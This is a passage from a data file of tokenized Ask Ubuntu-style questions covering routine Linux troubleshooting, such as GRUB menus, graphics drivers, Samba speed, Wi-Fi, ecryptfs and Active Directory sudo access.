`` nvidia '' inactive `` intel '' endsection section `` device '' identifier `` intel '' driver `` modesetting '' busid `` pci:0 @ 0:2:0 '' endsection section `` screen '' identifier `` intel '' device `` intel '' endsection section `` device '' identifier `` nvidia '' driver `` nvidia '' busid `` pci:1 @ 0:0:0 '' option `` constraincursor '' `` off '' endsection section `` screen '' identifier `` nvidia '' device `` nvidia '' option `` allowemptyinitialconfiguration '' `` on '' endsection thanks in advance for your help everyone . do let me know if you need any more information . ant
455126	alt+shift and numlock	i 've recently upgraded my system to ubuntu 14.04 . now each time i use alt+shift to switch keyboard layout , light of numlock on my keyboard turns off . i need to duble-push num lock to have it enabled and keyboard light on . it 's dizzying me every time .
455127	2 linux partitions , how to force one 's grub menu to win ?	i have 2 ubuntu partitions ubuntu 14.04 that is my desktop system kubuntu 14.04 that is my development enviroment each time ubuntu 14.04 updates the kernel , writes his own grub menu , and each time kubuntu 14.04 updates the kernel , writes his own grub menu when kubuntu 14.04 has written his own grub menu , how can i force ubuntu 14.04 to gain again control of the grub menu ( and i suppose of the mbr ) ?
455128	could not link against libboost thread	after ./configure last few lines look like this : checking for the pthreads library -lpthreads ... no checking whether pthreads work without any flags ... no checking whether pthreads work with -kthread ... no checking whether pthreads work with -kthread ... no checking for the pthreads library -llthread ... no checking whether pthreads work with -pthread ... yes checking for joinable pthread attribute ... pthread_create_joinable checking if more special flags are required for pthreads ... no checking whether the boost : :thread includes are available ... yes configure : error : could not link against libboost_thread ! i installed sudo apt-get install libpthread-stubs0-dev but there is no changes . what should i do ? it 's ubuntu 14.04 .
455129	preventing déjà dup from attempting a backup when out of my network	i’ve set déjà dup to back up daily to my home network’s synology nas ( by webdav , if you’re curious ) . the problem is that my laptop comes with me to many places . my laptop does not seem to realise that it is not in my home network , and it tries ( and fails ‘loudly’ tossing up windows with error messages & cetera ) to make a backup . this is not only silly ( the backup process should at least be minimally context-aware ) , but also a potential security hazard ( it is not hard to imagine a malicious user creating a host on a third-party network with the correct ip address to mimic that of my home nas , and configure it to accept any login credentials whatsoever in order to obtain a fraudulent copy of my whole machine’s backup ) . the question therefore is this : is there a way of preventing déjà dup from attempting a backup when it is not sure it is on my home network ? this would seem to be a modest desire . ( then again , from what i read , it lacks even the rudimentary facility for allowing ftp login credentials to be passed , so maybe it’s not yet suitable for anything but the most trivial usage cases . )
455130	slow data transfer ( sata 6 ) in ubuntu 12.04	my hdd gives 60mb/s transfer rate in windows 7. but in ubuntu it is only around 21-27mb/s . any suggestions ? config is corei3-2317u with intel hd4000
455133	from terminal-1 , create new terminal , execute command ( e.g : start jboss ) , come back to terminal-1	as stated in the title , i want to start a new terminal from ( say ) terminal-1 . the new terminal will execute a command ( say , start jboss ) . and after starting jboss , there will be jboss log in terminal-2 , so i dont want to stay there as i have some other tasks to do . i want the control back to terminal-1 , so i can execute other commands . i am running script . example scenario : running a script where i need to : ( 1 ) install jboss ( 2 ) start jboss ( 3 ) deploy a code in jboss as . note : creating a new terminal is not a problem . i can follow this . the problem is to come back to the primary terminal for executing further command .
455135	how do i install adobe acrobat reader from the repository ?	how do i install adobe acrobat reader in ubuntu 14.04 using a trusty apt repository ? this is not a duplicate of how do i install adobe acrobat reader ? . in synaptic > repositories > other software i enabled `` canonical partners '' , but i still can not install acroread as it is not available on my 64-bit system . here 's the output from the console : root @ liv-inspiron : /home/liv # apt-get install acroread reading package lists ... done building dependency tree reading state information ... done e : unable to locate package acroread root @ liv-inspiron : /home/liv # apt-get install acroread : i386 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package acroread
455141	ssl network extender check point unable to have remote access intranet	i 'm trying to remotely connect to my desktop to have access to the private network of my company . i have been able to run java on firefox . however , when it ask me to give access to execute java and i accept it , the ssl network extender ( checkpoint ) launches a terminal to install something . it asks me for my root password . as soon as i introduce the password the window close throwing some error i am not able to capture the error . i think the problem is that ubuntu is not support as a linux os for my company . what can i do ? i really need to have remote access to the intranet . thanks in advance for your time .
455143	copying my backup files	i 've made a backup.tgz file of all my work , which is now in the root directory . can someone tell me the best way to copy it to an external hard drive ? i 'm guessing move it to the desktop , mount the external drive then just copy across ... but the exact code would be useful . ( nb . i made the backup.tgz following a procedure from a couple of years ago , but do n't have tech support any more . i 'm working in an older version of ubuntu , running koha , wanting to upgrade to a newer version and backing everything up first , just in case . )
455147	formatting and mounting a 32 tb raid 50 disk	i want to know how to format a 32 tb drive . what program should i use and what filesystem ? the largest drives i ever had to map before are 2-3 tb and i always used fdisk for formatting . but fdisk is not working for drives larger than 2.1 tb . i would prefer that the whole volume is mounted as a single logical drive . we need to store large files in it , some may well pass 4tb . i have an hp proliant dl380p gen8 server in my administration and configured two 1tb disks as a 1tb system drive and ten 4tb disks into a 30 tb drive using raid 50 . i installed ubuntu server 12.04 . update : i used parted to relabel the partition table to guid partition table ( gpt ) from msdos which is default for ubuntu server 12.04 parted /dev/sdb mklabel gpt i then used parted to create an ext4 partition , which i later relabeled to xfs with : mkfs.xfs /dev/sdb1 . the rest went smoothly .
455154	installing 'kubuntu 14.04 '	i do n't want to retain my winxp so i downloaded 'kubunu 14.04 ' . however , i ca n't find it at all , even in my bios . should i download it again ?
455159	should i change my python code if i upgrade my ubuntu ?	i have a software that i have been developing in python 3 for years . until today , i have been using ubuntu desktop 11.04 but now i want to move to a higher version of ubuntu . must i stay on ubuntu 11.04 so that i wo n't have to change parts of the source code of my software due to new changes in the higher versions of ubuntu ? wo n't a recent ubuntu version affect my software in any way ?
455161	top menu bar is sliding down after hover	i would like to hide a top menu bar . i mean when i hover the mouse over it , the top bar will slide down ( like the side bar ) . how can i do this ?
455167	why does n't my dock have the icons of my icon theme ?	i just downloaded numix circle icon theme . i applied that theme from unity tweak tool . now my launcher and nautilus has the theme i applied but cairo dock does n't . why is it so and how to change my dock to get that theme ? ps : - i am using ubuntu 14.04 with unity . i have also made some edits in my launcher as suggested in the answers here .
455168	xubuntu 14.04 - logitech mini boombox speaker fails to connect/stream sound over bluetooth	installed xubuntu 14.04 today and again unable to get logitech mini boombox to connect via bluetooth in linux . i have had the same problem in different versions of linux distro 's and and have tried some of the fixes suggested on the internet and this forum but each time i am unsuccessful . i am able to get the device added and it seems to pair . it connects to headset service but the sound still comes out of my pc speakers . a2dp sink ( send audio ) audio sink - stream setup fails as follows . error message : device added successfully but failed to connect . error message : connection failed : stream setup failed . would appreciate any help to sort this out . thanks
455175	problem with dual booting ubuntu and windows 8	i have got a new lenovo y510p with 8.1 , when i tried to install ubuntu , it did not detect the usb . so i changed the boot mode to legacy and selected priority to legacy first . before that i had also disabled the secure boot option . everything went well . but booting windows from grub wont ' work and i had to change the boot every time whenever i want to use windows . so i installed boot repair and did recommended repair . it screwed everything and ubuntu wo n't boot now . so i decided to remove windows totally and start afresh i installed ubuntu removing windows completely creating some 10 partitions . now when i try to install windows 8.1 it says windows ca n't be installed in gpt style partition . some forums suggested that it is due to booting in legacy mode . so i changed the boot mode to uefi . after this the bios wo n't detect my hard disk or usb stick . but the bios information page shows the hard disk is present . but booting wo n't work . it 's trying to boot from network . please help me
455178	full description of different tasksel kubuntu options ?	i 've noticed that there are a few different options for kubuntu 14.04 when you run the tasksel command . does anyone know where i can find a fuller description of what the different options install please ? e.g . what 's the difference between kubuntu-full and kubuntu-desktop ? tasksel -- list does n't give much info . thanks .
455181	amd radeon hd 7500m/7600m series driver for ubuntu 13.10 ?	my laptop is a toshiba satellite l840 with a radeon hd 7500m/7600m series graphics card . i am using ubuntu 13.10 saucy salamander . is my graphics card supported ? because i ca n't find a article or a tutorial about it . if it is n't supported than can i get it get it supported with another linux distribution ( preferably based on on ubuntu ) ?
455184	symbolic link error with mysql cluster and ubuntu 12.04	i want to install mysql cluster on ubuntu and i followed this tutorial install mysql cluster on ubuntu 12.04 lts . my management node installed successfully , but i am having a problem in my database node . according to the tutorial i should create a symbolic link and change directory to mysql . this is not working for me . ln -s mysql-cluster-gpl-7.3.3-linux-glibc2.5-x86_64 mysql cd mysql when i type command cd mysql it is giving me the error : -su : cd : mysql : no such file or directory can any one help me please ?
455185	being disconnected from the internet in ubuntu 14.04 in vmware workstation	i am setting up a server with ubuntu server 14.04 running on vmware workstation 10 . when the os was first installed the internet worked fine . after following some tutorials on youtube the internet stopped working . the internet works on the host machine ( windows 8.1 ) but no longer on ubuntu . i have tried multiple things such as restarting , using external wi-fi adapters and re-configuring & adding network adapters in vmware workstation . if anybody could help that would be great !
455186	ssh tunneling in ubuntu	i previously have been using bitvise in windows to do tunneling with ssh . but now i try to tunnel in ubuntu with ssh with pac , terminal , and putty , but i get this message : root @ ujang-aoa150 : /home/ujang # ssh -p 80 -d 1080 kacaw_11mei @ 49.213.19.2 the authenticity of host ' [ 49.213.19.2 ] :80 ( [ 49.213.19.2 ] :80 ) ' ca n't be established . rsa key fingerprint is 30 : fe:36:83 : d5:89:12 : be:28 : c1:35:56 : cd:23:3b : f6 . are you sure you want to continue connecting ( yes/no ) ? yes warning : permanently added ' [ 49.213.19.2 ] :80 ' ( rsa ) to the list of known hosts . kacaw_11mei @ 49.213.19.2 's password : welcome to ubuntu 12.04.4 lts ( gnu/linux 2.6.32-042stab084.17 i686 ) * documentation : https : //help.ubuntu.com/ the programs included with the ubuntu system are free software ; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright . ubuntu comes with absolutely no warranty , to the extent permitted by applicable law . last login : fri apr 25 20:30:25 2014 from 202.67.41.1 could not chdir to home directory /home/kacaw_11mei : no such file or directory connection to 49.213.19.2 closed . what is wrong with this ? is another way to do it ?
455190	i got canon ix6550 and want to install ubuntu on it	i got the problem and turned on canon and get the file linux ij printer driver ix6500 series.tar the inside of the file is a text file and i read it but did n't understand what i have to do . i tried unpacking ... but it does n't work . then i saw that i have to write something like : for ubuntu 10.10 ( 1 ) expanding the archived file and switching to the expanded directory [ user @ zzz /yyy ] $ tar zxvf cnijfilter-ix6500series-3.50-x-deb.tar.gz [ user @ zzz /yyy ] $ cd cnijfilter-ix6500series-3.50-x-deb ( 2 ) installing the printer driver [ user @ zzz /yyy ] $ sudo ./install.sh i do n't know where to write this ... ..can someone who know how to connect to my computer and do this . i would be very happy . when the installation is completed , a message instructing you to register the printer is displayed .
455198	sharing internet connection with tablet over a proxy-server	i have a proxy-server at home and set up my ubuntu accordingly . all works fine . my setup is that you can only gain internet access over that proxy . now i have setup a raspberry pi with an edimax wireless adapter to act as an accesspoint with dns , dhcp and nat and all is runnning smooth . i connected a tablet ( nexus7 ) to that new wireless network and all works fine . my internal tablet-ip is 192.168.10.100 and when i ping to my proxy-server the raspberry pi successfully replaces it with his own ip . ( wireshark proven ) the problem now is that i cant gain internet access with my tablet . in wireshark my tablet is not adressing the proxy but tries to directly access the ip from google for example . these two pictures show a capture from the outgoing network card . the network card with internet access . wrong requesst from tablet right request from raspberry pi ( the ... 5.179 is the proxy-server ) the question is : how can i make the tablet adress the right proxy without manually adding the proxy into its setup ? is there a `` real '' internet connection sharing where the networkcard of my raspberry answers the requests ? the current setup rather seems like forwarding to me . my iptables look like that : chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination accept all -- anywhere anywhere chain output ( policy accept ) target prot opt source destination with commands entered : iptables -- table nat -- append postrouting -- out-interface eth0 -j masquerade iptables -- append forward -- in-interface wlan0 -j accept
455201	gui toggle key for wifi hotspot ( on/off )	i want to create a gui widget like on/off toggle for running a set of commands . for example , to turn wifi hotspot on and off using ap-hotspot start/stop . anybody help me ...
455202	show extra icon in unity notification area ( 14.04 , copy agent )	i have installed copy agent but when i launch it the icon does n't show up in the notification area ... how can i fix this issue ?
455204	how to share current desktop through tightvnc	is it possible to share my current desktop in ubuntu 14.04 with tightvnc and connect and control it using an android app ( vnc viewer ) . i have installed tightvncserver and am able to connect with vnc viewer for android but i am brought to very basic x11 session that is not the desktop i intended to access but it is the right computer i am trying to access . i believe it is most likely a configuration but i do not know where to change this . i hope that is clear .
455205	add remote server for phpmyadmin	after i install phpmyadmin that i can access local mysql server , but i would like to add a remote mysql on windows . i can not add remote server from phpmyadmin . are there any configuration files to add remote server ? your information and help is great appreciated , regards , inung
455209	fatal error during grub portion of install 14.04	i was installing 14.04 on a box that was previously running xp . while there were two partions available , with no further need for xp i selected the whole drive for my install . during the grub portion of the install i received the fatal error message and it continued to a point where it hung up on a blank ubuntu coloured screen with the hourglass circle for about 45 mins at which point i considered it a fail and rebooted . now i still have access the the bios boot options and a pop up boot option selection but the ubuntu cd does not boot , and all i get is a blank black screen with a blinking cursor on the upper left hand side . now here is the question , short of connecting the hdd to another box and accessing it that way , how do i start a new clean install ?
455210	fglrx no screen found on ubuntu 14.04	i upgraded my computer from 13.10 to 14.04 , now my screen goes black after booting , but i can access tty1 . after a little experimenting , i tried using start x it gave me this error ( from /var/log/xorg.0.log ) . i have tried : ca n't install ati proprietary drivers in 12.10 what is the correct way to install proprietary ati catalyst video drivers ( fglrx ) directly from amd ? ati driver issue , fglrxinfo returning null display error , xorg.conf file looks funky my computer boots to a black screen , what options do i have to fix it ? also fglrxinfo gave me this error : unable to open display ( null ) and all of them still gave me the same result , what option left that i have ? what should i do and is there a step that i miss ? thank you
455211	how to add domain admins to sudoers	there is a similar question that has been answered ; so , i 'm not sure if i should tag on ; not believing that i should , i 'm proceeding . i 'm running ubuntu 14.04 and have joined our windows domain using pbis ( formerly likewise-open ) . i can get an individual user account sudo privileges , but can not get domain admins the same . i 've tried every variation of % domain\domain^admins i 've see so far with no success . thanks in advance for any assistance .
455212	unable to locate package update when updating ubuntu server	i have not been able to update my packages for a while now . after i run the sudo apt-get install update command , the server tells me : reading package list ... done building dependency tree reading state information ... done e : unable to locate package update` , and i am also not able to install a gui probably because of the same problem . i am using ubuntu server 14.04 lts connected to the internet .
455215	problem to set the lightdm wallpaper in ubuntu 14.04 ?	i used ubuntu tweak to change the login screen background , but it didnt work for my user . my ubuntu has 2 users . to my user ( admin ) it shows the correct image ( that had set in ubuntu tweak ) for less than 1 second and change to my desktop wallpaper . to the other user ( normal user ) it shows the correct image . after login , it changes to the desktop wallpaper ( another picture ) correctly . any idea ? thanks .
455218	no button on login screen for switching between gnome , unity2d	i have just installed ubuntu 14.04 . i installed gnome-shell as well . however , i do not see the button on the login screen which will allow me to choose between unity and gnome . i am using lightdm please help .
455222	how to use the geany debugger ?	i am new to debugging and i need to how to use the debugger in geany ide . is there any documentation or a video available in the internet related to the geany debugger ? i have surfed everywhere but i could n't find anything understandable . can anyone help me out ?
455223	could not find urbi when compiling	i have installed urbi-suite-1.22.1-linux32 and to compile the system i try both of the following commands : ./build.sh and cd __build cmake -dcmake_install_prefix= $ ( pwd ) /install but i get following error : urbi_root_archi 'i686-pc-linux-gnu' -- _urbi_include_search_dir /include -- _urbi_library_search_dir /bin ; /gostai/core/i686-pc-linux-gnu/engine ; /gostai/engine ; /lib -- _urbi_executable_search_dir /bin -- urbi_include_dirs urbi_include_dir-notfound -- urbi_library urbi_library-notfound -- urbi_port_library urbi_port_library-notfound -- urbi_executable urbi_executable-notfound cmake error at /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:91 ( message ) : could not find urbi ( missing : urbi_version_string urbi_executable urbi_include_dir urbi_library urbi_version_major urbi_version_rev ) call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:252 ( _fphsa_failure_message ) cmake/modules/findurbi.cmake:261 ( find_package_handle_standard_args ) cmakelists.txt:27 ( find_package ) -- configuring incomplete , errors occurred ! how can i fix this ?
455224	installing amd hd 4xxx propriety drivers on ubuntu 14.04	i am very new to ubuntu , have only been using it for 2 days . i am running 14.04 i experienced a few graphics problems while running dota 2 ( linux version ) . fps was fine but a few weird glitchy marks and lines constantly appeared . i thought to download the propriety drivers from amd website to fix this . after running the driver in the terminal it gave me a message about 'one or more tools missing ' , instructing me to go to usr/share/ati for more info . this is what it says : check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.13.0-24-generic/build/include/linux/version.h can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended . -- -- does anyone have any idea of what i must do here ?
455226	can not see the text in terminal	i am new at ubuntu . i installed pulse audio for ubuntu and suddenly the terminal stop responding with no text . i have tried removing and installing it again via the software center . uxterm works i tried typing : sudo apt-get install terminal but that did only says : 0 remove and 0 installed and then i 'm lost , and do not know what to do , and how to make it work , and can someone please help .
455228	why does it say i dont have any os on my system when i try to install ubuntu	i 'm currently attempting to install ubuntu to my pc which currently has windowns 8.1 installed on it . i hear linux systems are much better and i would like to try them but from what i 've managed to research about it , they are a little tricky to get used to . i 'd like to keep windows 8.1 for now , possibly keep it for good just because it 's already conveniently set up . but linux is also better for learning programming and thats something i 'm interested in . i wan na learn and linux is just where the learning seems to be . i managed to figure out that i have too many partitions or i think i do but i 'm a bit confused about it because i see a c drive and a d drive . either way it does n't thing i have windows on my computer when i try to install ubuntu but i definitely have windows still . can anyone help me figure out my problem ?
455230	videos are running too fast	i am very new to linux , facing a very different problem of running videos on ubuntu 14.04 while watching videos the frame rate is three times faster , than the original speed i.e . the shot of time duration 3 seconds is been shown in just a single second . please help me !
455234	is mutter supposed to be my window manager on plain ubuntu ?	i ran into some problems after installing gnome on my ubuntu 14.04 desktop . i have managed to address most appearance-related issues . however , if i run sudo update-alternatives -- config x-window-manager i get : there is only one alternative in link group x-window-manager ( providing /usr/bin/x-window-manager ) : /usr/bin/mutter nothing to configure . as far as i know , mutter is the window manager for gnome , not unity . what is the window manager for unity and how can i install/restore it ? ( alternatively , does unity 7 / 14.04 in fact use mutter ? )
455235	intel wireless 7260 problems in ubuntu 14.04	my internet connection is really slow and unstable sometimes and only on my ubuntu machine = ( can somebody help me
455239	error with installing the latest amd graphics driver in 14.04	when i was installing the latest amd graphics beta driver , i found that ubuntu 14.04 can not load the desktop . after log in the screen only displays the the wallpaper and mouse cursor ( mouse cursor can move ) . my laptop has two graphics cards ; intel and ati . i found an error in xorg.0.log , as stated below : [ 26.033 ] ( ii ) intel ( 0 ) : edid vendor `` auo '' , prod id 12348 [ 26.033 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 26.033 ] ( ii ) intel ( 0 ) : modeline `` 1366x768 '' x0.0 69.30 1366 1404 1426 1436 768 771 777 803 -hsync -vsync ( 48.3 khz ep ) [ 26.033 ] ( ii ) intel ( 0 ) : modeline `` 1366x768 '' x0.0 46.20 1366 1404 1426 1436 768 771 777 803 -hsync -vsync ( 32.2 khz e ) [ 150.658 ] ( ii ) intel ( 0 ) : switch to mode 1366x768 @ 60.1 on lvds1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 150.675 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 155.931 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 157.521 ] ( ii ) xkb : generating xkmfile /var/lib/xkb/server-992dcd2811f9928d990f91f3229e52a1ec62b72a.xkm [ 157.536 ] ( ee ) error loading keymap /var/lib/xkb/server-992dcd2811f9928d990f91f3229e52a1ec62b72a.xkm [ 159.422 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 182.925 ] ( ii ) intel ( 0 ) : switch to mode 1366x768 @ 60.1 on lvds1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 182.946 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 183.055 ] ( ii ) xkb : generating xkmfile /var/lib/xkb/server-992dcd2811f9928d990f91f3229e52a1ec62b72a.xkm [ 183.072 ] ( ee ) error loading keymap /var/lib/xkb/server-992dcd2811f9928d990f91f3229e52a1ec62b72a.xkm
455241	unable to install ubuntu 14.04 desktop	i am primarily a windows user but i recently decided to give ubuntu a try . i headed over to the ubuntu website and downloaded ubuntu 14.04 32-bit desktop version and created a bootable usb drive using rufus . everything went fine until here . but when i booted my pc from this usb drive , i get a blank black screen and after about 1 or 2 seconds the following message pops up : after this i have no choice but to restart the pc . does anyone knows how this can be solved ? p.s . i also tried booting from a cd , but it gives the exact same results .
455243	how do i get grub-customizer to change appearance on grub screen ?	in linuxmint 16 , installed grub-customizer . changed font size , colors , put in png picture and looks terrific in grub-cusomizer ... but does not affect the boot up grub screen in any way . still shows up white on black . i have configured as generating grub.cfg ... using custom appearance settings found background image : /home/dave/downloads/new pics/fantasy_by_snowskadi.png found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic found memtest86+ image : /boot/memtest86+.bin no volume groups found found windows 7 ( loader ) on /dev/sda1 found zorin os 8 ( 8 ) on /dev/sda5 done grub edit shows : i wonder if these two lines need to be deleted ? ? : found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic any help would sure be appreciated .
455245	some keys not working until ~10/20min using laptop	i 'm having , since 3-4 months some strange problems with my laptop 's keyboard . it 's an asus x401a running ubuntu 12.04.3 x64 . when i start the notebook , some keys ( a , d , g , i , m , k , down arrow ) do n't work at all - ( always the same keys ) . the strange thing is , that if you hold down one of them 1 minute or more , at the end it works , but if you try again , you have to hold it down again for a while ( the same happens if holding down another of the 'problematic ' keys ) . but the big mystery happens when 10 or 20 minutes have passed since laptop started : you have a fully functional keyboard with all keys working ( like now , writing this question ) . i 've tried to boot into the root shell , and did n't had any problem with the keyboard , so i guess that has to be something gui related . also , i 've tried to look in an htop window at the same time that i hold down a key when is not working , but does n't seem to happen nothing unusual . i 'll really appreciate if someone can help a little with this issue that pisses me off every time that i have hurry to do something . thanks all ! !
455250	ca n't install xampp on ubuntu 13.10	i ca n't install xampp on ubuntu 13.10 . i 'm getting the following message : chmod : can not access ‘xampp-linux-x64-1.8.3-2-installer.run’ : no such file or directory
455251	ubuntu 14.04 gnome metacity fallback does n't update background	the gnome metacity fallback does n't update the background producing a windows xp-esque effect : i first thought this was a problem with my gnome configuration . i deleted my config and cleaned up my . * config files . but the result was the same . i 'm kind of at a loss here on how to debug this . installed packages : http : //pastebin.com/raw.php ? i=nky7kieg the relevant puppet configuration to reproduce the bug is located here : http : //pastebin.com/raw.php ? i=w2pshfuv the problem does n't occur with the compiz fallback ( however there individual workspaces do n't work ) . interestingly it does n't show any background as well . since there 's no background available i guess that i forgot something to start ( or something ca n't start ) . so what does gnome use for backgrounds these days ? is it still nautilus ? i think part of the problem is that i started with the ubuntu installer and then added all the installers on top of it . i think the os is missing some dependencies . but i 'm not sure on how to debug these . i deleted the following config folders : rm -rf .gnome .gnome2 .gconf .gconfd .metacity .cache .dbus .dmrc .mission-control .thumbnails .config .xauthority .gvfs .gegl-0.0 .local .pulse-cookie .fontconfig edit : manually executing nautilus -- force-desktop seems to work around the issue .
455252	samba slow between mac and ubuntu server 12.04	i am having trouble with speed of access between imacs running mavericks and an ubuntu server using samba . the server ( 12.04 ) is running on a former dell pc with 3gb ram and a 2.8ghz pentium server . i 'm running samba , and a php / mysql database across a gigabit lan . the php database works fine with no visible lag , although it 's only updating the odd line of text so nothing too strenuous . the problem really manifests itself when using spotlight on the mac to locate a certain file . if i select the directory in finder everything shows up fairly quickly , however if i search for a particular file name or partial name , the results often take minutes to be returned . i have about 500gb of data across 36624 files stored on the server . i 've set the owners / users / groups to match across the imacs and the server . i 've read that there are some peculiarities with mavericks and samba ( according to this - http : //www.tuaw.com/2013/10/27/did-m ... s-heres-a-fix/ ) however i thought i 'd look for a second opinion . is this some sort of indexing problem , or is my hardware not up to the task ? if the latter , is it processor related , ram related , or should n't i be using an old pc for this task ? i 'm relatively new to ubuntu server , and it 's grating that i am having this problem . many thanks , jason update 15/5/2014 i 've found the answer to this now . it appears that i can install afp ( netatalk ) on the ubuntu server . i followed this guide : - http : //missingreadme.wordpress.com/2010/05/08/how-to-set-up-afp-filesharing-on-ubuntu/ everything works fine now : )
455254	how to write using the lithuanian layout ?	i have chosen the lithuanian keyboard layout along with english ( us ) , but the lithuanian layout does n't work . i can switch to it using alt+shift , but the symbols do not appear when i write - it 's as if i 'm using the english layout . this started happening on a fresh 14.04 installation . it did n't happen before .
455256	nautilus crash `` aborted ( 'core ' dumped ) ''	i have ubuntu 12.04 amd64 and i have a problem with nautilus . when i opened , it then closes itself instantly , making also the desktop icons disappear . usually it closes when i open a new folder . also it freezes sometimes and i can only close it with xkill , so i tried to investigate the problem in terminal and get this error message : error : nautilus-directory.c:631 : nautilus_directory_remove_file : assertion failed : ( node ! = null ) aborted ( `core ' dumped ) does anyone know the answer ?
455257	no wi-fi in lubuntu 14.04	i have a dual-boot computer with os x on one partition and lubuntu 14.04 on the other . wi-fi works in os x but in lubuntu there is no network icon in the toolbar and only ethernet is listed under network connections . however , the output of nm-tool is $ nm-tool networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : b43 state : disconnected default : no hw address : 90:84:0d : f3:85:7e capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points followed by a long list of access points , so the wireless adapter seems to be doing something . i have also installed firmware-b43-installer . any clues ? how do i connect to my router ?
455258	blender 2.70 not installed , but can open it , yet ca n't find it in dash or add it to launcher	i have downloaded blender 2.7 and moved it to folder /opt and yet i ca n't find it in dash or place it in launcher . i have searched for solutions on the net , but i do n't quite understand those .
455261	web developer mentors	i recently started learning web development from scratch . i initially started with code academy , but have switched to the odin project because it offers a structure to learning . unfortunately the biggest wall i 'm hitting is hardware related . i love learning the code aspect , but understanding ubuntu 12.04 , which i installed on my chromebook 14 for the purpose of learning development , has caused a lot of frustration . understanding how drivers work , for example , has been tough . i installed ubuntu 12.04 , but the server connection only works part of the time . after researching , through various ubuntu forums , i noticed many people uninstalled network manager and replaced it with wicd . after doing so , my wireless connection still does not connect . so now i 'm trying to learn as much as possible about the drivers and whatever else is necessary to get my laptop up and running . wish there were mentors in learning web development that offered help in getting equipment properly setup and then teaching how it all works . any suggestions ?
455264	setting pulse equalizer as `` powerful '' in windows	i 've been using the `` powerful '' eq setting in windows ( which comes with realtek , i think ) for years and i 'm very pleased with its results . i 'm trying to create the same eq setting with pulse equalizer but they have different channels . is there any way i could replicate this with pulse eq :
455265	how to add active directory users as sudoers	i 'm following this article . what i 've done : i can connect to active directory i can login to the active directory now what i 'm looking for is a way to make any active directory user a sudoer . i 'm using ubuntu 14.04 and active directory 2008r2
455267	ubuntu switched from eth0 to eth2 after changing network adapter	i am virtualizing an ubuntu desktop 10.04 . as i had to change the ethernet adapter mac address i got an eth2 network interface in place of eth0 . i 'd like to reswitch to eth0 . on centos there is a file in which you can edit those things ... how can i do the same in ubuntu ?
455269	ca n't log in after i insert the correct password	i recently tried to upgrade to ubuntu 14.04 from the command line but it did n't work for some reason . it was `` upgrading '' for about two hours and when i restarted my computer i still had 13.10 . when i tried to log in to my account it took my password as correct but it wound't let me in . i 'm still on the lock screen and the insert password bar under my log in name is gone . because i saw this was a problem i restarted a went into recovery mode ( ubuntu with linux 3.11.0.-20-generic [ recovery mode ] ) . then i went to dpkg ( repair broken packages ) because if that normally fixes everything . however when i tried to repair the packages it gave me this `` e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? & `` e : failed to fetch http : //us.archieve.ubuntu.com/ubuntu/pool/universe/t/thin-client-config-agent/thin-client-config-agent_0.8_all.deb could not resolve `` us.archieve.ubuntu.com '' . if i could get to a terminal for ubuntu i could easily fix this problem but it wo n't let me access it . i did ctrl + alt + t on the lock screen but that did n't work . : /
455270	upgrade ubuntu server from 12.04 lts to 14.04 lts	right now i have ubuntu server 12.04 lts . this server is important for our production , so i need to update server to 14.04 lts carefully . i did setup lxc containers and each container have their own process running ( e.g gitlab , database , .. ) . what i want to know is should i take any backup before update , if yes how should i take backup . it is first time for me to upgrade server os and also i 'm new to ubuntu . if some thing goes wrong our production will get effect badly . i want to know how long would it take to upgrade .
455271	battery not charging above 34 % on lenovo e430	my system spec is : os : ubuntu 12.04 lts os type : 64-bit laptop model : lenovo thinkpad e430 . my laptop is plugged to the wall for more than 10 hours . but the battery percentage never goes above 34 % . restarting the pc does not help . i removed the plug and used the pc until the battery was completely drained . but after plugging it to wall . the battery is still stuck on 34 % . what can be the problem and what needs to be done further ?
455272	how do i make ecryptfs automount in xubuntu ?	when i set up ecryptfs in xbuntu 's installer , everything was great . when i logged in , it just worked . i changed the passphraise with ecryptfs-rewrap-passphrase . now , nothing works automatically anymore . before i login through lightdm , i have to either run ecryptfs-insert-wrapped-passphrase-into-keyring to put the key in the keyring . either that or mount it myself with ecryptfs-mount-private . how do i ensure i can get the key in the keyring on boot like it occurs if you install and chose the option to encrypt home ? ecryptfs-manager said it put the key in the kernel 's keyring , but it did n't persist on restart . why is this task so damn hard , what man page even describes this . i 'm not impressed with xubuntu 's encrypted home functionality , and lightdm not prompting me but silently failing when the home is encrypted is totally lackluster .
455275	banglalion modem issue in ubuntu 14.04 lts	i have problems getting my banglalion wimax 4g modem to work . it was properly working in ubuntu 12.04 lts and ubuntu 13.10 . i have seen a wimax option in the network manager of ubuntu 14.04 lts . how can i install it ?
455276	help with nautilus and dropbox	i tried to download dropbox , which worked ok but then i got a message to restart nautilus for dropbox to work properly . but when i click the button that says `` restart nautilus '' nothing happens . i need to let you know i am totally un-techy , so please could you keep things as straight forward and simple as possible ? is there a simple fix that a total noob with no technical knowledge can do ?
